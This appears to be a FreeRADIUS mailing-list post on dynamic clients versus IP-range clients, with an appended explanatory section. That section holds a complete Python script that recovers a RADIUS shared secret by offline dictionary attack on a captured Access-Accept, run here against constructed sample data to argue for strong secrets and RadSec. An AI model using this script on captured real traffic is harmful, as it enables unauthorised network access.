Dynamic Clients IP Best practice?

Arran Cudbard-Bell a.cudbardb at freeradius.org
Fri Jun 24 12:41:13 CEST 2011


> 
> The advantage compared to the "ip range client" solution is that you get
> to keep unique shortnames and secrets per hotspot.  But I don't want to
> estimate any security gain, since you must allow the clients to update
> their own client entry.  If one of hotspots is insecure, then the whole
> network will be insecure.

OK, there are a couple of issues with using a database for dynamic clients.

1. The main server thread handles adding dynamic clients and blocks whilst the client is being read out of the database. This means no new requests are passed to the worker threads until the SQL module returns and the client is added. The normal way to mitigate this is to preload all existing clients from the SQL DB, but you can't do that in this case because that would create static entries, and potentially cause a conflict when an access point changes IP address (shared secrets would then be incorrect if you were using unique ones).

So if lots of APs were active and being added for the first time since the server started you may notice increased latency responding to requests. It also kinda hoses the server if the database becomes inaccessible.

2. Because you're using dynamic IP addresses there's the potential for conflict. If two access points swapped IP allocations and you were using unique shared secrets, the AP info would not be updated; the requests would just be rejected with bad shared secret errors. There is a cache timer to expire entries, but if you set it too short you'll run into real issues with 1) above.

So if you were to use dynamic clients you'd most likely want to use common shared secrets. Honestly, with today's computational power they're pretty easy to break anyway (one of the many reasons for RADSEC).

The only advantage then is Client-Short-Name, which you could easily populate using an SQL xlat from a database of MAC addresses (Calling-Station-Id) to short names (or a flat file; just change the key to be Calling-Station-Id).

In this instance, if the NASes aren't in too many different subnets and the subnets aren't likely to change, then IP ranges are still probably the best solution. Dynamic clients are not really suited to highly dynamic environments.

-Arran


Arran Cudbard-Bell
a.cudbardb at freeradius.org

RADIUS - Half the complexity of Diameter
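The remark above that RADIUS shared secrets are "pretty easy to break" rests on how the Response Authenticator is built: RFC 2865 defines it as MD5(Code + ID + Length + RequestAuthenticator + Attributes + Secret), and the Request Authenticator travels in the clear. One captured Access-Request/Access-Accept pair is therefore enough for an offline guessing attack, one MD5 per candidate, with no further traffic to the server. The following is an added example written for this page, not code from the original post or from FreeRADIUS; the packet (secret, identifier, Request Authenticator, Reply-Message attribute) and the word list are constructed here purely for illustration.

```python
import hashlib
import struct

# RFC 2865 packet code for Access-Accept
ACCESS_ACCEPT = 2


def encode_attrs(attrs):
    """Encode a list of (type, value_bytes) pairs as RADIUS TLV attributes."""
    out = b""
    for attr_type, value in attrs:
        out += struct.pack("!BB", attr_type, len(value) + 2) + value
    return out


def response_authenticator(code, ident, request_auth, attrs, secret):
    """RFC 2865 section 3:
    ResponseAuth = MD5(Code + ID + Length + RequestAuth + Attributes + Secret)
    where Length covers the 20-byte header plus the attributes."""
    length = 20 + len(attrs)
    header = struct.pack("!BBH", code, ident, length)
    return hashlib.md5(header + request_auth + attrs + secret).digest()


def recover_secret(code, ident, request_auth, attrs, observed_auth, candidates):
    """Offline dictionary attack: recompute the authenticator for each candidate
    secret and return the first one that reproduces the captured value."""
    for cand in candidates:
        if response_authenticator(code, ident, request_auth, attrs, cand) == observed_auth:
            return cand
    return None


# --- constructed sample "capture" (not real traffic) ---
SAMPLE_SECRET = b"testing123"          # the secret we pretend the NAS and server share
SAMPLE_IDENT = 0x2A                    # packet identifier, copied from the request
SAMPLE_REQUEST_AUTH = bytes(range(16)) # NAS's Request Authenticator, visible on the wire
SAMPLE_ATTRS = encode_attrs([(18, b"Welcome")])  # 18 = Reply-Message
# What an attacker would read out of the captured Access-Accept:
SAMPLE_RESPONSE_AUTH = response_authenticator(
    ACCESS_ACCEPT, SAMPLE_IDENT, SAMPLE_REQUEST_AUTH, SAMPLE_ATTRS, SAMPLE_SECRET
)

# A constructed word list; a real attack would use a large dictionary or brute force.
WORDLIST = [b"radius", b"secret", b"password", b"testing123", b"changeme"]


def demo():
    """Run the guessing attack against the constructed capture."""
    return recover_secret(
        ACCESS_ACCEPT, SAMPLE_IDENT, SAMPLE_REQUEST_AUTH,
        SAMPLE_ATTRS, SAMPLE_RESPONSE_AUTH, WORDLIST,
    )


if __name__ == "__main__":
    print("recovered secret:", demo())
```

Every guess costs exactly one MD5 over a few dozen bytes, which is why a short or dictionary-derived shared secret offers little protection once traffic can be observed; the same secret also keys User-Password hiding and the Message-Authenticator attribute, so recovering it exposes everything that NAS sends. This is the practical argument for long random secrets per NAS where the deployment allows, and for RadSec (RADIUS over TLS) where it does not.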
